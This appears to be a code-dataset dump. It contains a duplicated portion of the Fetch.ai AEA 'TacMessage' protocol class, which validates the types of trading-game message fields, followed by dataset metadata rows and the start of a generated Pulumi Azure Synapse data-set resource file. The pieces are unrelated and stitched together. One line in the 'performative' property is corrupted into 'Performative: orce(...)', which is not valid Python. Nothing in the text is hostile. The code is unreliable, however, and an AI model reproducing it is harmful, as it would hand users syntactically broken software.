type(value_of_exchange_params_by_currency_id) == float,
"Invalid type for dictionary values in content 'exchange_params_by_currency_id'. Expected 'float'. Found '{}'.".format(
type(value_of_exchange_params_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
enforce(
type(self.utility_params_by_good_id) == dict,
"Invalid type for content 'utility_params_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.utility_params_by_good_id)
),
)
for (
key_of_utility_params_by_good_id,
value_of_utility_params_by_good_id,
) in self.utility_params_by_good_id.items():
enforce(
type(key_of_utility_params_by_good_id) == str,
"Invalid type for dictionary keys in content 'utility_params_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_utility_params_by_good_id)
),
)
enforce(
type(value_of_utility_params_by_good_id) == float,
"Invalid type for dictionary values in content 'utility_params_by_good_id'. Expected 'float'. Found '{}'.".format(
type(value_of_utility_params_by_good_id)
),
)
enforce(
type(self.fee_by_currency_id) == dict,
"Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.fee_by_currency_id)
),
)
for (
key_of_fee_by_currency_id,
value_of_fee_by_currency_id,
) in self.fee_by_currency_id.items():
enforce(
type(key_of_fee_by_currency_id) == str,
"Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_fee_by_currency_id)
),
)
enforce(
type(value_of_fee_by_currency_id) == int,
"Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_fee_by_currency_id)
),
)
enforce(
type(self.agent_addr_to_name) == dict,
"Invalid type for content 'agent_addr_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.agent_addr_to_name)
),
)
for (
key_of_agent_addr_to_name,
value_of_agent_addr_to_name,
) in self.agent_addr_to_name.items():
enforce(
type(key_of_agent_addr_to_name) == str,
"Invalid type for dictionary keys in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_agent_addr_to_name)
),
)
enforce(
type(value_of_agent_addr_to_name) == str,
"Invalid type for dictionary values in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_agent_addr_to_name)
),
)
enforce(
type(self.currency_id_to_name) == dict,
"Invalid type for content 'currency_id_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.currency_id_to_name)
),
)
for (
key_of_currency_id_to_name,
value_of_currency_id_to_name,
) in self.currency_id_to_name.items():
enforce(
type(key_of_currency_id_to_name) == str,
"Invalid type for dictionary keys in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_currency_id_to_name)
),
)
enforce(
type(value_of_currency_id_to_name) == str,
"Invalid type for dictionary values in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_currency_id_to_name)
),
)
enforce(
type(self.good_id_to_name) == dict,
"Invalid type for content 'good_id_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.good_id_to_name)
),
)
for (
key_of_good_id_to_name,
value_of_good_id_to_name,
) in self.good_id_to_name.items():
enforce(
type(key_of_good_id_to_name) == str,
"Invalid type for dictionary keys in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_good_id_to_name)
),
)
enforce(
type(value_of_good_id_to_name) == str,
"Invalid type for dictionary values in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_good_id_to_name)
),
)
enforce(
type(self.version_id) == str,
"Invalid type for content 'version_id'. Expected 'str'. Found '{}'.".format(
type(self.version_id)
),
)
if self.is_set("info"):
expected_nb_of_contents += 1
info = cast(Dict[str, str], self.info)
enforce(
type(info) == dict,
"Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
type(info)
),
)
for key_of_info, value_of_info in info.items():
enforce(
type(key_of_info) == str,
"Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
type(key_of_info)
),
)
enforce(
type(value_of_info) == str,
"Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
type(value_of_info)
),
)
elif self.performative == TacMessage.Performative.TRANSACTION_CONFIRMATION:
expected_nb_of_contents = 3
enforce(
type(self.transaction_id) == str,
"Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
type(self.transaction_id)
),
)
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
elif self.performative == TacMessage.Performative.TAC_ERROR:
expected_nb_of_contents = 1
enforce(
type(self.error_code) == CustomErrorCode,
"Invalid type for content 'error_code'. Expected 'ErrorCode'. Found '{}'.".format(
type(self.error_code)
),
)
if self.is_set("info"):
expected_nb_of_contents += 1
info = cast(Dict[str, str], self.info)
enforce(
type(info) == dict,
"Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
type(info)
),
)
for key_of_info, value_of_info in info.items():
enforce(
type(key_of_info) == str,
"Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
type(key_of_info)
),
)
enforce(
type(value_of_info) == str,
"Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
type(value_of_info)
),
)
# Check correct content count
enforce(
expected_nb_of_contents == actual_nb_of_contents,
"Incorrect number of contents. Expected {}. Found {}".format(
expected_nb_of_contents, actual_nb_of_contents
),
)
# Light Protocol Rule 3
if self.message_id == 1:
enforce(
self.target == 0,
"Invalid 'target'. Expected 0 (because 'message_id' is 1). Found {}.".format(
self.target
),
)
except (AEAEnforceError, ValueError, KeyError) as e:
_default_logger.error(str(e))
return False
return True
| 44.150454 | 143 | 0.503613 |
import logging
from typing import Any, Dict, Optional, Set, Tuple, cast
from aea.configurations.base import PublicId
from aea.exceptions import AEAEnforceError, enforce
from aea.protocols.base import Message
from packages.fetchai.protocols.tac.custom_types import ErrorCode as CustomErrorCode
_default_logger = logging.getLogger("aea.packages.fetchai.protocols.tac.message")
DEFAULT_BODY_SIZE = 4
class TacMessage(Message):
protocol_id = PublicId.from_str("fetchai/tac:0.15.0")
protocol_specification_id = PublicId.from_str("fetchai/tac:1.0.0")
ErrorCode = CustomErrorCode
class Performative(Message.Performative):
CANCELLED = "cancelled"
GAME_DATA = "game_data"
REGISTER = "register"
TAC_ERROR = "tac_error"
TRANSACTION = "transaction"
TRANSACTION_CONFIRMATION = "transaction_confirmation"
UNREGISTER = "unregister"
def __str__(self) -> str:
return str(self.value)
_performatives = {
"cancelled",
"game_data",
"register",
"tac_error",
"transaction",
"transaction_confirmation",
"unregister",
}
__slots__: Tuple[str, ...] = tuple()
class _SlotsCls:
__slots__ = (
"agent_addr_to_name",
"agent_name",
"amount_by_currency_id",
"counterparty_address",
"counterparty_signature",
"currency_id_to_name",
"dialogue_reference",
"error_code",
"exchange_params_by_currency_id",
"fee_by_currency_id",
"good_id_to_name",
"info",
"ledger_id",
"message_id",
"nonce",
"performative",
"quantities_by_good_id",
"sender_address",
"sender_signature",
"target",
"transaction_id",
"utility_params_by_good_id",
"version_id",
)
def __init__(
self,
performative: Performative,
dialogue_reference: Tuple[str, str] = ("", ""),
message_id: int = 1,
target: int = 0,
**kwargs: Any,
):
super().__init__(
dialogue_reference=dialogue_reference,
message_id=message_id,
target=target,
performative=TacMessage.Performative(performative),
**kwargs,
)
@property
def valid_performatives(self) -> Set[str]:
return self._performatives
@property
def dialogue_reference(self) -> Tuple[str, str]:
enforce(self.is_set("dialogue_reference"), "dialogue_reference is not set.")
return cast(Tuple[str, str], self.get("dialogue_reference"))
@property
def message_id(self) -> int:
enforce(self.is_set("message_id"), "message_id is not set.")
return cast(int, self.get("message_id"))
@property
def performative(self) -> Performative: orce(self.is_set("performative"), "performative is not set.")
return cast(TacMessage.Performative, self.get("performative"))
@property
def target(self) -> int:
enforce(self.is_set("target"), "target is not set.")
return cast(int, self.get("target"))
@property
def agent_addr_to_name(self) -> Dict[str, str]:
enforce(
self.is_set("agent_addr_to_name"),
"'agent_addr_to_name' content is not set.",
)
return cast(Dict[str, str], self.get("agent_addr_to_name"))
@property
def agent_name(self) -> str:
enforce(self.is_set("agent_name"), "'agent_name' content is not set.")
return cast(str, self.get("agent_name"))
@property
def amount_by_currency_id(self) -> Dict[str, int]:
enforce(
self.is_set("amount_by_currency_id"),
"'amount_by_currency_id' content is not set.",
)
return cast(Dict[str, int], self.get("amount_by_currency_id"))
@property
def counterparty_address(self) -> str:
enforce(
self.is_set("counterparty_address"),
"'counterparty_address' content is not set.",
)
return cast(str, self.get("counterparty_address"))
@property
def counterparty_signature(self) -> str:
enforce(
self.is_set("counterparty_signature"),
"'counterparty_signature' content is not set.",
)
return cast(str, self.get("counterparty_signature"))
@property
def currency_id_to_name(self) -> Dict[str, str]:
enforce(
self.is_set("currency_id_to_name"),
"'currency_id_to_name' content is not set.",
)
return cast(Dict[str, str], self.get("currency_id_to_name"))
@property
def error_code(self) -> CustomErrorCode:
enforce(self.is_set("error_code"), "'error_code' content is not set.")
return cast(CustomErrorCode, self.get("error_code"))
@property
def exchange_params_by_currency_id(self) -> Dict[str, float]:
enforce(
self.is_set("exchange_params_by_currency_id"),
"'exchange_params_by_currency_id' content is not set.",
)
return cast(Dict[str, float], self.get("exchange_params_by_currency_id"))
@property
def fee_by_currency_id(self) -> Dict[str, int]:
enforce(
self.is_set("fee_by_currency_id"),
"'fee_by_currency_id' content is not set.",
)
return cast(Dict[str, int], self.get("fee_by_currency_id"))
@property
def good_id_to_name(self) -> Dict[str, str]:
enforce(self.is_set("good_id_to_name"), "'good_id_to_name' content is not set.")
return cast(Dict[str, str], self.get("good_id_to_name"))
@property
def info(self) -> Optional[Dict[str, str]]:
return cast(Optional[Dict[str, str]], self.get("info"))
@property
def ledger_id(self) -> str:
enforce(self.is_set("ledger_id"), "'ledger_id' content is not set.")
return cast(str, self.get("ledger_id"))
@property
def nonce(self) -> str:
enforce(self.is_set("nonce"), "'nonce' content is not set.")
return cast(str, self.get("nonce"))
@property
def quantities_by_good_id(self) -> Dict[str, int]:
enforce(
self.is_set("quantities_by_good_id"),
"'quantities_by_good_id' content is not set.",
)
return cast(Dict[str, int], self.get("quantities_by_good_id"))
@property
def sender_address(self) -> str:
enforce(self.is_set("sender_address"), "'sender_address' content is not set.")
return cast(str, self.get("sender_address"))
@property
def sender_signature(self) -> str:
enforce(
self.is_set("sender_signature"), "'sender_signature' content is not set."
)
return cast(str, self.get("sender_signature"))
@property
def transaction_id(self) -> str:
enforce(self.is_set("transaction_id"), "'transaction_id' content is not set.")
return cast(str, self.get("transaction_id"))
@property
def utility_params_by_good_id(self) -> Dict[str, float]:
enforce(
self.is_set("utility_params_by_good_id"),
"'utility_params_by_good_id' content is not set.",
)
return cast(Dict[str, float], self.get("utility_params_by_good_id"))
@property
def version_id(self) -> str:
enforce(self.is_set("version_id"), "'version_id' content is not set.")
return cast(str, self.get("version_id"))
def _is_consistent(self) -> bool:
try:
enforce(
type(self.dialogue_reference) == tuple,
"Invalid type for 'dialogue_reference'. Expected 'tuple'. Found '{}'.".format(
type(self.dialogue_reference)
),
)
enforce(
type(self.dialogue_reference[0]) == str,
"Invalid type for 'dialogue_reference[0]'. Expected 'str'. Found '{}'.".format(
type(self.dialogue_reference[0])
),
)
enforce(
type(self.dialogue_reference[1]) == str,
"Invalid type for 'dialogue_reference[1]'. Expected 'str'. Found '{}'.".format(
type(self.dialogue_reference[1])
),
)
enforce(
type(self.message_id) == int,
"Invalid type for 'message_id'. Expected 'int'. Found '{}'.".format(
type(self.message_id)
),
)
enforce(
type(self.target) == int,
"Invalid type for 'target'. Expected 'int'. Found '{}'.".format(
type(self.target)
),
)
enforce(
type(self.performative) == TacMessage.Performative,
"Invalid 'performative'. Expected either of '{}'. Found '{}'.".format(
self.valid_performatives, self.performative
),
)
actual_nb_of_contents = len(self._body) - DEFAULT_BODY_SIZE
expected_nb_of_contents = 0
if self.performative == TacMessage.Performative.REGISTER:
expected_nb_of_contents = 1
enforce(
type(self.agent_name) == str,
"Invalid type for content 'agent_name'. Expected 'str'. Found '{}'.".format(
type(self.agent_name)
),
)
elif self.performative == TacMessage.Performative.UNREGISTER:
expected_nb_of_contents = 0
elif self.performative == TacMessage.Performative.TRANSACTION:
expected_nb_of_contents = 10
enforce(
type(self.transaction_id) == str,
"Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
type(self.transaction_id)
),
)
enforce(
type(self.ledger_id) == str,
"Invalid type for content 'ledger_id'. Expected 'str'. Found '{}'.".format(
type(self.ledger_id)
),
)
enforce(
type(self.sender_address) == str,
"Invalid type for content 'sender_address'. Expected 'str'. Found '{}'.".format(
type(self.sender_address)
),
)
enforce(
type(self.counterparty_address) == str,
"Invalid type for content 'counterparty_address'. Expected 'str'. Found '{}'.".format(
type(self.counterparty_address)
),
)
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.fee_by_currency_id) == dict,
"Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.fee_by_currency_id)
),
)
for (
key_of_fee_by_currency_id,
value_of_fee_by_currency_id,
) in self.fee_by_currency_id.items():
enforce(
type(key_of_fee_by_currency_id) == str,
"Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_fee_by_currency_id)
),
)
enforce(
type(value_of_fee_by_currency_id) == int,
"Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_fee_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
enforce(
type(self.nonce) == str,
"Invalid type for content 'nonce'. Expected 'str'. Found '{}'.".format(
type(self.nonce)
),
)
enforce(
type(self.sender_signature) == str,
"Invalid type for content 'sender_signature'. Expected 'str'. Found '{}'.".format(
type(self.sender_signature)
),
)
enforce(
type(self.counterparty_signature) == str,
"Invalid type for content 'counterparty_signature'. Expected 'str'. Found '{}'.".format(
type(self.counterparty_signature)
),
)
elif self.performative == TacMessage.Performative.CANCELLED:
expected_nb_of_contents = 0
elif self.performative == TacMessage.Performative.GAME_DATA:
expected_nb_of_contents = 9
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.exchange_params_by_currency_id) == dict,
"Invalid type for content 'exchange_params_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.exchange_params_by_currency_id)
),
)
for (
key_of_exchange_params_by_currency_id,
value_of_exchange_params_by_currency_id,
) in self.exchange_params_by_currency_id.items():
enforce(
type(key_of_exchange_params_by_currency_id) == str,
"Invalid type for dictionary keys in content 'exchange_params_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_exchange_params_by_currency_id)
),
)
enforce(
type(value_of_exchange_params_by_currency_id) == float,
"Invalid type for dictionary values in content 'exchange_params_by_currency_id'. Expected 'float'. Found '{}'.".format(
type(value_of_exchange_params_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
enforce(
type(self.utility_params_by_good_id) == dict,
"Invalid type for content 'utility_params_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.utility_params_by_good_id)
),
)
for (
key_of_utility_params_by_good_id,
value_of_utility_params_by_good_id,
) in self.utility_params_by_good_id.items():
enforce(
type(key_of_utility_params_by_good_id) == str,
"Invalid type for dictionary keys in content 'utility_params_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_utility_params_by_good_id)
),
)
enforce(
type(value_of_utility_params_by_good_id) == float,
"Invalid type for dictionary values in content 'utility_params_by_good_id'. Expected 'float'. Found '{}'.".format(
type(value_of_utility_params_by_good_id)
),
)
enforce(
type(self.fee_by_currency_id) == dict,
"Invalid type for content 'fee_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.fee_by_currency_id)
),
)
for (
key_of_fee_by_currency_id,
value_of_fee_by_currency_id,
) in self.fee_by_currency_id.items():
enforce(
type(key_of_fee_by_currency_id) == str,
"Invalid type for dictionary keys in content 'fee_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_fee_by_currency_id)
),
)
enforce(
type(value_of_fee_by_currency_id) == int,
"Invalid type for dictionary values in content 'fee_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_fee_by_currency_id)
),
)
enforce(
type(self.agent_addr_to_name) == dict,
"Invalid type for content 'agent_addr_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.agent_addr_to_name)
),
)
for (
key_of_agent_addr_to_name,
value_of_agent_addr_to_name,
) in self.agent_addr_to_name.items():
enforce(
type(key_of_agent_addr_to_name) == str,
"Invalid type for dictionary keys in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_agent_addr_to_name)
),
)
enforce(
type(value_of_agent_addr_to_name) == str,
"Invalid type for dictionary values in content 'agent_addr_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_agent_addr_to_name)
),
)
enforce(
type(self.currency_id_to_name) == dict,
"Invalid type for content 'currency_id_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.currency_id_to_name)
),
)
for (
key_of_currency_id_to_name,
value_of_currency_id_to_name,
) in self.currency_id_to_name.items():
enforce(
type(key_of_currency_id_to_name) == str,
"Invalid type for dictionary keys in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_currency_id_to_name)
),
)
enforce(
type(value_of_currency_id_to_name) == str,
"Invalid type for dictionary values in content 'currency_id_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_currency_id_to_name)
),
)
enforce(
type(self.good_id_to_name) == dict,
"Invalid type for content 'good_id_to_name'. Expected 'dict'. Found '{}'.".format(
type(self.good_id_to_name)
),
)
for (
key_of_good_id_to_name,
value_of_good_id_to_name,
) in self.good_id_to_name.items():
enforce(
type(key_of_good_id_to_name) == str,
"Invalid type for dictionary keys in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
type(key_of_good_id_to_name)
),
)
enforce(
type(value_of_good_id_to_name) == str,
"Invalid type for dictionary values in content 'good_id_to_name'. Expected 'str'. Found '{}'.".format(
type(value_of_good_id_to_name)
),
)
enforce(
type(self.version_id) == str,
"Invalid type for content 'version_id'. Expected 'str'. Found '{}'.".format(
type(self.version_id)
),
)
if self.is_set("info"):
expected_nb_of_contents += 1
info = cast(Dict[str, str], self.info)
enforce(
type(info) == dict,
"Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
type(info)
),
)
for key_of_info, value_of_info in info.items():
enforce(
type(key_of_info) == str,
"Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
type(key_of_info)
),
)
enforce(
type(value_of_info) == str,
"Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
type(value_of_info)
),
)
elif self.performative == TacMessage.Performative.TRANSACTION_CONFIRMATION:
expected_nb_of_contents = 3
enforce(
type(self.transaction_id) == str,
"Invalid type for content 'transaction_id'. Expected 'str'. Found '{}'.".format(
type(self.transaction_id)
),
)
enforce(
type(self.amount_by_currency_id) == dict,
"Invalid type for content 'amount_by_currency_id'. Expected 'dict'. Found '{}'.".format(
type(self.amount_by_currency_id)
),
)
for (
key_of_amount_by_currency_id,
value_of_amount_by_currency_id,
) in self.amount_by_currency_id.items():
enforce(
type(key_of_amount_by_currency_id) == str,
"Invalid type for dictionary keys in content 'amount_by_currency_id'. Expected 'str'. Found '{}'.".format(
type(key_of_amount_by_currency_id)
),
)
enforce(
type(value_of_amount_by_currency_id) == int,
"Invalid type for dictionary values in content 'amount_by_currency_id'. Expected 'int'. Found '{}'.".format(
type(value_of_amount_by_currency_id)
),
)
enforce(
type(self.quantities_by_good_id) == dict,
"Invalid type for content 'quantities_by_good_id'. Expected 'dict'. Found '{}'.".format(
type(self.quantities_by_good_id)
),
)
for (
key_of_quantities_by_good_id,
value_of_quantities_by_good_id,
) in self.quantities_by_good_id.items():
enforce(
type(key_of_quantities_by_good_id) == str,
"Invalid type for dictionary keys in content 'quantities_by_good_id'. Expected 'str'. Found '{}'.".format(
type(key_of_quantities_by_good_id)
),
)
enforce(
type(value_of_quantities_by_good_id) == int,
"Invalid type for dictionary values in content 'quantities_by_good_id'. Expected 'int'. Found '{}'.".format(
type(value_of_quantities_by_good_id)
),
)
elif self.performative == TacMessage.Performative.TAC_ERROR:
expected_nb_of_contents = 1
enforce(
type(self.error_code) == CustomErrorCode,
"Invalid type for content 'error_code'. Expected 'ErrorCode'. Found '{}'.".format(
type(self.error_code)
),
)
if self.is_set("info"):
expected_nb_of_contents += 1
info = cast(Dict[str, str], self.info)
enforce(
type(info) == dict,
"Invalid type for content 'info'. Expected 'dict'. Found '{}'.".format(
type(info)
),
)
for key_of_info, value_of_info in info.items():
enforce(
type(key_of_info) == str,
"Invalid type for dictionary keys in content 'info'. Expected 'str'. Found '{}'.".format(
type(key_of_info)
),
)
enforce(
type(value_of_info) == str,
"Invalid type for dictionary values in content 'info'. Expected 'str'. Found '{}'.".format(
type(value_of_info)
),
)
enforce(
expected_nb_of_contents == actual_nb_of_contents,
"Incorrect number of contents. Expected {}. Found {}".format(
expected_nb_of_contents, actual_nb_of_contents
),
)
if self.message_id == 1:
enforce(
self.target == 0,
"Invalid 'target'. Expected 0 (because 'message_id' is 1). Found {}.".format(
self.target
),
)
except (AEAEnforceError, ValueError, KeyError) as e:
_default_logger.error(str(e))
return False
return True
| true | true |
1c3323146779e0cbb445f721075cc2454146f5ce | 13,377 | py | Python | sdk/python/pulumi_azure_native/datashare/synapse_workspace_sql_pool_table_data_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/datashare/synapse_workspace_sql_pool_table_data_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_native/datashare/synapse_workspace_sql_pool_table_data_set.py | polivbr/pulumi-azure-native | 09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = ['SynapseWorkspaceSqlPoolTableDataSetArgs', 'SynapseWorkspaceSqlPoolTableDataSet']
@pulumi.input_type
class SynapseWorkspaceSqlPoolTableDataSetArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
kind: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
share_name: pulumi.Input[str],
synapse_workspace_sql_pool_table_resource_id: pulumi.Input[str],
data_set_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a SynapseWorkspaceSqlPoolTableDataSet resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] kind: Kind of data set.
Expected value is 'SynapseWorkspaceSqlPoolTable'.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_name: The name of the share to add the data set to.
:param pulumi.Input[str] synapse_workspace_sql_pool_table_resource_id: Resource id of the Synapse Workspace SQL Pool Table
:param pulumi.Input[str] data_set_name: The name of the dataSet.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "kind", 'SynapseWorkspaceSqlPoolTable')
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "share_name", share_name)
pulumi.set(__self__, "synapse_workspace_sql_pool_table_resource_id", synapse_workspace_sql_pool_table_resource_id)
if data_set_name is not None:
pulumi.set(__self__, "data_set_name", data_set_name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the share account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
Kind of data set.
Expected value is 'SynapseWorkspaceSqlPoolTable'.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shareName")
def share_name(self) -> pulumi.Input[str]:
"""
The name of the share to add the data set to.
"""
return pulumi.get(self, "share_name")
@share_name.setter
def share_name(self, value: pulumi.Input[str]):
pulumi.set(self, "share_name", value)
@property
@pulumi.getter(name="synapseWorkspaceSqlPoolTableResourceId")
def synapse_workspace_sql_pool_table_resource_id(self) -> pulumi.Input[str]:
"""
Resource id of the Synapse Workspace SQL Pool Table
"""
return pulumi.get(self, "synapse_workspace_sql_pool_table_resource_id")
@synapse_workspace_sql_pool_table_resource_id.setter
def synapse_workspace_sql_pool_table_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "synapse_workspace_sql_pool_table_resource_id", value)
@property
@pulumi.getter(name="dataSetName")
def data_set_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the dataSet.
"""
return pulumi.get(self, "data_set_name")
@data_set_name.setter
def data_set_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_set_name", value)
class SynapseWorkspaceSqlPoolTableDataSet(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_name: Optional[pulumi.Input[str]] = None,
